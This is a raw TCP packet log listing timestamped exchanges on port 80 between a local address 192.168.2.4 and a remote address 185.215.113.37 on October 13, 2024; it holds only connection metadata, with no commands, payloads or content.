Oct 13, 2024 17:46:19.866969109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.866980076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.866991043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.866991043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867005110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867031097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867031097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867041111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867058992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867075920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867085934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867084980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867098093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867109060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867115021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867142916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867153883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867161036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867161036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867166996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867188931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867197990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867214918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867224932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867235899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867238998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867238998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867238998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867249012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867332935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867342949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867352962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867358923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867358923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867362976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867376089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867378950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867405891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867414951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867425919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867435932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867459059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867459059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867485046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867495060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867503881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867515087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867526054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867526054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867611885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867624044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867634058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867643118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867652893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867662907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867664099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867664099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867675066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867686987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867688894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867697954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867706060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867708921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867719889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867733002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867752075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867755890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867765903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867775917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867794991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867816925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867830038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867841005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867847919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867881060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867881060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.867898941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867968082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.867978096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.868005037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.868025064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.868025064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.868045092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.868056059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.869368076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.954247952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954277039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954296112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954308033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954328060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954339981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954350948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954361916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954371929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954380989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954391003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954401970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954411030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954422951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954423904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.954423904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.954479933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.954479933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.954479933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.954566956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954579115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954596043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954607010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954663038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.954663038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.954663038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.954760075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954777956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954794884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954804897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954814911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954826117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954834938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954843998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.954844952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954857111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954869032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954879999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954884052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.954902887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.954902887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.954902887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.955415964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.955514908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955537081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955548048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955594063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955605030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955605984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.955605984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.955624104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955635071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955646038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955647945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.955665112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955677032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955688000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955689907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.955689907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.955734968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.955847025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955863953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955874920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955885887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955894947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.955894947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.955895901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955909014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955919981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955936909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.955936909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.955945969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955956936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.955966949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.956005096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.956005096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.956005096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.956053972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.956064939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.956075907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.956085920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.956096888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.956108093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.956119061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.956129074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.956139088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.956139088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.956139088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.956242085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.956242085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.957314014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957420111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957429886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957439899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957452059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957463026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957470894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.957470894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.957473993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957485914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957534075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.957534075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.957567930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957578897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957590103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957624912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957636118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957645893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957657099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957667112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957668066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.957668066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.957706928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957717896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957719088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.957719088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.957731962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957879066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957890034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957902908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.957902908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.957915068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957931995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957945108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957953930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.957953930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.957966089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957978010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957988977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.957998991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958000898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.958010912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958015919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.958024025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958033085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958050013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958060980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958070040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958082914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958091974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.958091974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.958095074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958107948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958117962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958127975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958133936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.958133936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.958139896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958153009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958162069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958172083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958210945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.958210945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.958211899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.958247900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958259106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958396912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958406925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958417892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958427906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958437920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958448887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958458900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958468914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.958470106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958468914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.958487988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958492994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.958492994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.958501101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958512068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958522081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958532095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958544016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958554029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.958554029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958554029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.958569050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.958828926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.958828926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.044617891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.044650078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.044718027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.044718027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.046947956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.047123909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.048888922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.048903942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.049160004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.049392939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.049405098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.049588919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.052243948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.052450895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.053970098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.054084063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.054095030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.054106951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.054249048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.057188988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.057611942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.058820009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.058831930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.058840990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.058851957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.058862925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.058923006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.058923006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.062377930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.062484980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.063520908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.063534021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.063698053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.063735008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.063941956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.067243099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.067256927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.068273067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.068284988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.068470955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.068470955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.068672895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.069758892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.073031902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.073050022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.073379993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.074567080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.074598074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.074668884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.074668884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.077874899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.077888966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.077899933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.077972889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.077972889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.079277992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.079293013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.079360008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.082607985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.082623005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.082633972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.082698107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.082698107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.083993912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.084007025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.084197044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.087451935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.087466002 CEST	80	49730	185.215.113.37	192.168.2.4
